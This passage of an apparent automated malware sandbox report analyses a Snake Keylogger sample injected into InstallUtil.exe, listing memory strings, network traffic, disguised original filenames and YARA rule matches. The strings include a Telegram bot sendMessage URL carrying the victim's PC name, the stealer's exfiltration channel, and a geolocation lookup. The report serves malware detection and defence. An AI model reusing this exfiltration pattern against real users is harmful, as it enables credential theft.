                    Source: sS7Jrsk0Z7.exe, 00000001.00000002.1805361382.0000000003BA9000.00000004.00000800.00020000.00000000.sdmp, sS7Jrsk0Z7.exe, 00000001.00000002.1805361382.0000000003C2F000.00000004.00000800.00020000.00000000.sdmp, sS7Jrsk0Z7.exe, 00000001.00000002.1805361382.0000000003DC6000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2528573106.0000000002C86000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2525054374.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                    Source: InstallUtil.exe, 0000000A.00000002.2528573106.0000000002C86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
                    Source: InstallUtil.exe, 0000000A.00000002.2528573106.0000000002C86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:610930%0D%0ADate%20a
                    Source: InstallUtil.exe, 0000000A.00000002.2531605024.0000000003BC1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2531605024.0000000003EB9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                    Source: InstallUtil.exe, 0000000A.00000002.2531605024.0000000003BC1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2531605024.0000000003EB9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                    Source: InstallUtil.exe, 0000000A.00000002.2531605024.0000000003BC1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2531605024.0000000003EB9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                    Source: InstallUtil.exe, 0000000A.00000002.2528573106.0000000002D27000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
                    Source: InstallUtil.exe, 0000000A.00000002.2528573106.0000000002D31000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
                    Source: InstallUtil.exe, 0000000A.00000002.2531605024.0000000003BC1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2531605024.0000000003EB9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
                    Source: InstallUtil.exe, 0000000A.00000002.2531605024.0000000003BC1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2531605024.0000000003EB9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
                    Source: InstallUtil.exe, 0000000A.00000002.2531605024.0000000003BC1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2531605024.0000000003EB9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                    Source: InstallUtil.exe, 0000000A.00000002.2528573106.0000000002C86000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2528573106.0000000002C5F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2528573106.0000000002BEF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org
                    Source: sS7Jrsk0Z7.exe, 00000001.00000002.1805361382.0000000003BA9000.00000004.00000800.00020000.00000000.sdmp, sS7Jrsk0Z7.exe, 00000001.00000002.1805361382.0000000003C2F000.00000004.00000800.00020000.00000000.sdmp, sS7Jrsk0Z7.exe, 00000001.00000002.1805361382.0000000003DC6000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2525054374.0000000000402000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2528573106.0000000002BEF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/
                    Source: InstallUtil.exe, 0000000A.00000002.2528573106.0000000002BEF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
                    Source: InstallUtil.exe, 0000000A.00000002.2528573106.0000000002C19000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2528573106.0000000002C86000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2528573106.0000000002C5F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
                    Source: InstallUtil.exe, 0000000A.00000002.2531605024.0000000003BC1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2531605024.0000000003EB9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
                    Source: sS7Jrsk0Z7.exe | String found in binary or memory: https://www.globalsign.com/repository/0
                    Source: InstallUtil.exe, 0000000A.00000002.2531605024.0000000003BC1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2531605024.0000000003EB9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                    Source: InstallUtil.exe, 0000000A.00000002.2528573106.0000000002D68000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.office.com/
                    Source: InstallUtil.exe, 0000000A.00000002.2528573106.0000000002D63000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.office.com/lB
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49975
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49985
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49983
                    Source: unknown | Network traffic detected: HTTP traffic on port 49976 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 49975 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49981
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49992
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49991
                    Source: unknown | Network traffic detected: HTTP traffic on port 49989 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 49985 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 49987 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 49983 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 49981 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 49991 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 49992 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 49979 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49979
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49989
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49976
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49987
                    Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49992 version: TLS 1.2

                    System Summary

                    Source: 1.2.sS7Jrsk0Z7.exe.3e4ca8a.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 1.2.sS7Jrsk0Z7.exe.3e4ca8a.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 1.2.sS7Jrsk0Z7.exe.3e4ca8a.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 1.2.sS7Jrsk0Z7.exe.3e4ca8a.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 1.2.sS7Jrsk0Z7.exe.3e4ca8a.1.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 1.2.sS7Jrsk0Z7.exe.3e4ca8a.1.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 10.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 10.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 10.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 1.2.sS7Jrsk0Z7.exe.3c2f6d0.4.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 1.2.sS7Jrsk0Z7.exe.3c2f6d0.4.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 1.2.sS7Jrsk0Z7.exe.3c2f6d0.4.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 1.2.sS7Jrsk0Z7.exe.3dc68da.3.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 1.2.sS7Jrsk0Z7.exe.3dc68da.3.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 1.2.sS7Jrsk0Z7.exe.3dc68da.3.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 1.2.sS7Jrsk0Z7.exe.3e099ba.2.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 1.2.sS7Jrsk0Z7.exe.3e099ba.2.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 1.2.sS7Jrsk0Z7.exe.3e099ba.2.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 1.2.sS7Jrsk0Z7.exe.3c2f6d0.4.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 1.2.sS7Jrsk0Z7.exe.3c2f6d0.4.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 1.2.sS7Jrsk0Z7.exe.3c2f6d0.4.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 1.2.sS7Jrsk0Z7.exe.3e099ba.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 1.2.sS7Jrsk0Z7.exe.3e099ba.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 1.2.sS7Jrsk0Z7.exe.3e099ba.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 1.2.sS7Jrsk0Z7.exe.3dc68da.3.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 1.2.sS7Jrsk0Z7.exe.3dc68da.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 1.2.sS7Jrsk0Z7.exe.3dc68da.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 00000001.00000002.1805361382.0000000003BA9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 0000000A.00000002.2525054374.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 00000001.00000002.1805361382.0000000003C2F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 00000001.00000002.1805361382.0000000003DC6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: Process Memory Space: sS7Jrsk0Z7.exe PID: 6676, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: Process Memory Space: InstallUtil.exe PID: 7612, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exe | Code function: 1_2_0901BBB8 CreateProcessAsUserW
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exe | Code function: 1_2_010B8030
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exe | Code function: 1_2_010B72F0
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exe | Code function: 1_2_010BBC38
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exe | Code function: 1_2_02B20FA0
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exe | Code function: 1_2_02B20520
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exe | Code function: 1_2_050062A1
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exe | Code function: 1_2_050062B0
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exe | Code function: 1_2_050048EC
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exe | Code function: 1_2_076DBEE0
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exe | Code function: 1_2_076D4418
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exe | Code function: 1_2_076D0040
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exe | Code function: 1_2_07804328
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exe | Code function: 1_2_0780FA88
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exe | Code function: 1_2_07804318
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exe | Code function: 1_2_0780E250
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exe | Code function: 1_2_078B47A0
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exe | Code function: 1_2_078BFD40
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exe | Code function: 1_2_078BFD50
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exe | Code function: 1_2_078B003E
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exe | Code function: 1_2_078B0040
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exe | Code function: 1_2_0798F7E0
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exe | Code function: 1_2_0798DF69
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exe | Code function: 1_2_0798CAD0
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exe | Code function: 1_2_0798D6F0
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exe | Code function: 1_2_0798BA38
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exe | Code function: 1_2_07987E40
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exe | Code function: 1_2_07983CBA
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exe | Code function: 1_2_0798D6CA
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exe | Code function: 1_2_07982D11
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exe | Code function: 1_2_07982D20
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exe | Code function: 1_2_09018DA8
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exe | Code function: 1_2_090114C0
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exe | Code function: 1_2_09014BF8
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exe | Code function: 1_2_09016A50
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exe | Code function: 1_2_0901C280
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exe | Code function: 1_2_09019D10
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exe | Code function: 1_2_09015C10
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exe | Code function: 1_2_09011010
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exe | Code function: 1_2_09012070
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exe | Code function: 1_2_0901A478
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exe | Code function: 1_2_09011090
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exe | Code function: 1_2_090110A0
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exe | Code function: 1_2_090114B1
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exe | Code function: 1_2_09011308
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exe | Code function: 1_2_09011318
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exe | Code function: 1_2_09018750
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exe | Code function: 1_2_090107B0
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exe | Code function: 1_2_090107C0
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exe | Code function: 1_2_09011FC0
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exe | Code function: 1_2_09014BE9
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exe | Code function: 1_2_09010E58
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exe | Code function: 1_2_09010E68
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exe | Code function: 1_2_09010AB0
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exe | Code function: 1_2_078B4790
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 10_2_0123C147
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 10_2_01235362
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 10_2_0123D278
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 10_2_0123C46F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 10_2_0123C738
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 10_2_012369A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 10_2_0123E988
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 10_2_0123CA08
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 10_2_01233AA1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 10_2_01239DE0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 10_2_0123CCD8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 10_2_0123CFAA
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 10_2_01236FC8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 10_2_01233E09
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 10_2_0123F631
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 10_2_0123E97A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 10_2_012339EE
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 10_2_012329EC
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 10_2_0123FA88
                    Source: sS7Jrsk0Z7.exe | Static PE information: invalid certificate
                    Source: sS7Jrsk0Z7.exe, 00000001.00000002.1806875709.0000000005070000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameBamokinepApp.dll< vs sS7Jrsk0Z7.exe
                    Source: sS7Jrsk0Z7.exe, 00000001.00000002.1805361382.0000000003BA9000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameRemington.exe4 vs sS7Jrsk0Z7.exe
                    Source: sS7Jrsk0Z7.exe, 00000001.00000000.1265966992.0000000000F14000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameQuick Any2Ico.exe< vs sS7Jrsk0Z7.exe
                    Source: sS7Jrsk0Z7.exe, 00000001.00000002.1798101450.0000000003028000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameRemington.exe4 vs sS7Jrsk0Z7.exe
                    Source: sS7Jrsk0Z7.exe, 00000001.00000002.1805361382.0000000003C2F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameRemington.exe4 vs sS7Jrsk0Z7.exe
                    Source: sS7Jrsk0Z7.exe, 00000001.00000002.1805361382.0000000003C2F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameBamokinepApp.dll< vs sS7Jrsk0Z7.exe
                    Source: sS7Jrsk0Z7.exe, 00000001.00000002.1797402151.000000000111E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs sS7Jrsk0Z7.exe
                    Source: sS7Jrsk0Z7.exe, 00000001.00000002.1810705411.0000000007960000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameRP8SH.dll6 vs sS7Jrsk0Z7.exe
                    Source: sS7Jrsk0Z7.exe, 00000001.00000002.1805361382.0000000003D18000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameBamokinepApp.dll< vs sS7Jrsk0Z7.exe
                    Source: sS7Jrsk0Z7.exe, 00000001.00000002.1805361382.0000000003DC6000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameRemington.exe4 vs sS7Jrsk0Z7.exe
                    Source: sS7Jrsk0Z7.exe | Binary or memory string: OriginalFilenameQuick Any2Ico.exe< vs sS7Jrsk0Z7.exe
                    Source: sS7Jrsk0Z7.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 1.2.sS7Jrsk0Z7.exe.3e4ca8a.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 1.2.sS7Jrsk0Z7.exe.3e4ca8a.1.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 1.2.sS7Jrsk0Z7.exe.3e4ca8a.1.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 1.2.sS7Jrsk0Z7.exe.3e4ca8a.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 1.2.sS7Jrsk0Z7.exe.3e4ca8a.1.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 1.2.sS7Jrsk0Z7.exe.3e4ca8a.1.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 10.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 10.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 10.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 1.2.sS7Jrsk0Z7.exe.3c2f6d0.4.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 1.2.sS7Jrsk0Z7.exe.3c2f6d0.4.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 1.2.sS7Jrsk0Z7.exe.3c2f6d0.4.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 1.2.sS7Jrsk0Z7.exe.3dc68da.3.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 1.2.sS7Jrsk0Z7.exe.3dc68da.3.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 1.2.sS7Jrsk0Z7.exe.3dc68da.3.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 1.2.sS7Jrsk0Z7.exe.3e099ba.2.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
